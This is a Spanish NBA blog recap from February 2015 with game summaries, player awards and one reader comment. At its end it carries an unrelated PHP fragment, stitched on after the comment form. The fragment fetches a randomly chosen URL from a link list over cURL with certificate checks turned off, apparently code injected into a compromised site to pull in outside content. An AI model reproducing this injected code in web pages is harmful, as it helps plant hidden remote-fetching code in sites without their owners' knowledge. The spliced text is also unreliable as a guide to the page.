La Crónica: Demasiada Barba

11 de February de 2015 por txusma

Los Suns sufrieron anoche una caso de “exceso de Barba”, una dolencia que se está propagando esta campaña en la NBA. Las víctimas se acumulan y los Rockets, mientras tanto, ya marchan con el cuarto mejor balance de entre todos los equipos pese a la baja de Dwight Howard (¿y pese al alta de Josh Smith?). Harden fue el gran protagonista de una velada que tuvo otros nombres propios: Lionel Hollins, Tony Snell, Pau Gasol o Ty Lawson. Además, se cerró un traspaso y los Kings ya tienen nuevo entrenador.

Por partes:

beard

Houston Rockets 127 – Phoenix Suns 118

James Harden llevaba 18 puntos al descanso. Lo mejor, sin embargo, estaba por llegar. Los Rockets abrieron trecho en el primer cuarto, en el que los Suns encajaron 41 puntos y se vieron obligados a remontar si querían recuperar las opciones de victoria. Así lo hicieron: con Eric Bledsoe como su mejor hombre, los locales empezaron a sacar provecho de la ausencia de Dwight Howard en la pintura rival y en el tercer cuarto ya mandaban en el marcador. Entonces apareció la versión más dominante de James Harden, la que con frecuencia aparece en los últimos cuartos y que merece nuestra consideración para el premio del MVP de la temporada. The Beard anotó 7 de sus 10 lanzamientos de campo para 20 puntos en el cuarto periodo, 40 en el total de la noche, y los Suns no pudieron más que capitular. El resultado deja a los Suns en situación delicada, con el mismo número de derrotas que Pelicans y Thunder y la octava plaza que todavía ocupan, en serio riesgo.

Brooklyn Nets 86 – Memphis Grizzlies 95

“Welcome Home, Coach”. El vídeomarcador y el público del FedEx reconocían, en la previa del partido ante los Nets, la labor de Lionel Hollins en el moldeado de los actuales Grizzlies. La franquicia de Tennessee vive el mejor ciclo de su historia y el paso de Hollins por su banquillo es esencial para entender las claves de su éxito. El homenaje fue emotivo; cuando el balón estuvo en juego, las emociones se marcharon al vestuario y los Grizzlies aplicaron su receta habitual, 48 minutos de Grit ‘n Grind implacable. Los Nets apenas pudieron ver aro en los primeros minutos y se vieron ya con un 15-32 tras el cuarto inicial. A partir de ahí, jamás amenazaron seriamente a Memphis, que alcanzará las 40 victorias antes del All Star Weekend si esta noche se impone a los Thunder.

Sacramento Kings 86 – Chicago Bulls 104

El partido corrió relativamente igualado hasta un tercer cuarto que se presentaba complicado para los locales por la lesión de Jimmy Butler, que se tuvo que retirar con problemas en el hombro derecho. En su lugar salió Tony Snell y ofreció un clínic tanto en ataque como en defensa muy “a la Butler”. Anotó 24 puntos a la vez que desesperaba a Rudy Gay con su defensa. Con Snell en estado de gracia, el décimo tercer doble-doble consecutivo de Pau Gasol y 23 puntos de Derrick Rose, los Bulls tuvieron suficiente para acabar imponiéndose con comodidad. Por cierto, se da casi por segura la incoporación de George Karl como nuevo técnico de los Kings. Los de California necesitan como agua de mayo un técnico con carácter.

Denver Nuggets 106 – LA Lakers 96

6 derrotas consecutivas llevaban los Nuggets antes del partido de ayer. Los visitantes mostraron otra cara y a pesar de llegar a perder de 10 o más puntos en un par de fases de la primera parte y haber jugado el día antes fueron capaces de recuperarse y llegar empatados al último cuarto. En los primeros minutos los Nuggets, con Ty Lawson a la cabeza, consiguieron 10 puntos de ventaja pero los Lakers, que si algo demuestran tener es amor propio, volvieron a apretar el marcador. Sin embargo, los visitantes controlaron bien los últimos minutos y acabaron llevándose la victoria.

Detroit Pistons 106 – Charlotte Hornets 78

La paliza del día la sufrieron los Hornets en su propia casa y anet un rival directo como son los Detroit Pistons. Las torres visitantes controlaron a la perfección a Al Jefferson y los locales se vieron obligados a basarse en su juego exterior para llevarse el partido. Mientras les duró el acierto plantaron batalla pero en cuanto las canastas dejaron de entrar el encuentro cayó por su propio peso. Tercera derrota consecutiva para los Hornets que coincide con el tercer partido consecutivo que se pierde Michael Kidd-Gilchrist. Con él, los Hornets están 19-17, sin él 3-13. Ayer también hicieron oficial la salida de Gary Neal y una 2ª ronda a los Wolves a cambio de Mo Williams y Troy Daniels. El ya ex-Wolves llega para ocupar inmediatamente el vacío dejado por Kemba Walker en el quinteto titular.

PREMIOS

MVP: James Harden sigue presentando día a día su candidatura para llevarse el MVP de la temporada. Ayer, otra exhibición suya permitió a los Rockets llevarse la victoria en Phoenix. Anotó 40 puntos (20 en el último cuarto), cogió 12 rebotes, repartió 9 asistencias y robó 3 balones. Imposible pedirle más.

Rookie: Jusuf Nurkic jugó sólo 19 minutos pero le dio tiempo a anotar 6 puntos, coger 5 rebotes y poner 4 pinchos de merluza.

Sorpresa: Tony Snell tuvo que asumir responsabilidades ante la baja de Jimmy Butler y cumplió con creces. El jugador de segundo año consiguió 24 puntos con un 9 de 11 en TC.

Decepción: Victoria fácil para los Grizzlies a pesar del mal día de Mike Conley, que se quedó en sólo 2 puntos tras fallar 7 de los 8 tiros que intentó. Los mismos puntos anotó Kenneth Faried.

Esfuerzo en vano: Los Suns plantaron cara a los Rockets de la mano de Eric Bledsoe, que se quedó a un solo punto del récord anotador de su carrera. A sus 32 puntos, sumó 4 rebotes y 4 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Nacho dice:
    #1

    Lo de Harden es de ‘chapeau’. Él solito, rodeado de jugadores de los que solo algunos serían titulares en NY o LA, tiene al equipo en puestos de cabeza de serie.
    Por otro lado, mola lo de Korver al All Star, pero me sigue escociendo que un evento que premia a jugadores y franquicias (o lo que hacen los jugadores en éstas) no tenga a ningún Buck.
    Lo de Pau ya se merece el MVP de la insistencia, día tras día más de 20-15 es de locura. Recordemos que el mayor de los Gasol es ese tipo acabado de más de 34 años.
    Y lo que tenemos para analizar, apostar, gritar y esperar, son las dos últimas plazas para PO en el Este. Seis equipos en tres partidos. Va a molar…, sobre todo porque el primero de ellos no llega al 0.45 de victorias, con lo que ganar cada partido es un salto de la leche. Hoy el empujón es de los Pistons (¿es DJ Agustin el mejor titular tras lesión de compañero de la liga? lo hace año tras año) Las derrotas para Hornets (se habla de la baja de Kemba y de la de MKG, pero parece que echan más de menos a Biyombo -yo al menos en la fantasy, sí-) y Nets.
    Y el traspaso del día creo que es bueno para los dos. A corto ganan los Hornets (necesitan a alguien en la dirección ya!) porque se la juegan esta temporada, y a largo ganan en Minneápolis, porque Gary Neal es un jugador que les puede aportar mucho dsde el combo 1-2 y con Ricky y la necesidad de minutos de LaVine, y no jugarse nada este año, lo del bueno de Mo es prescindible.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>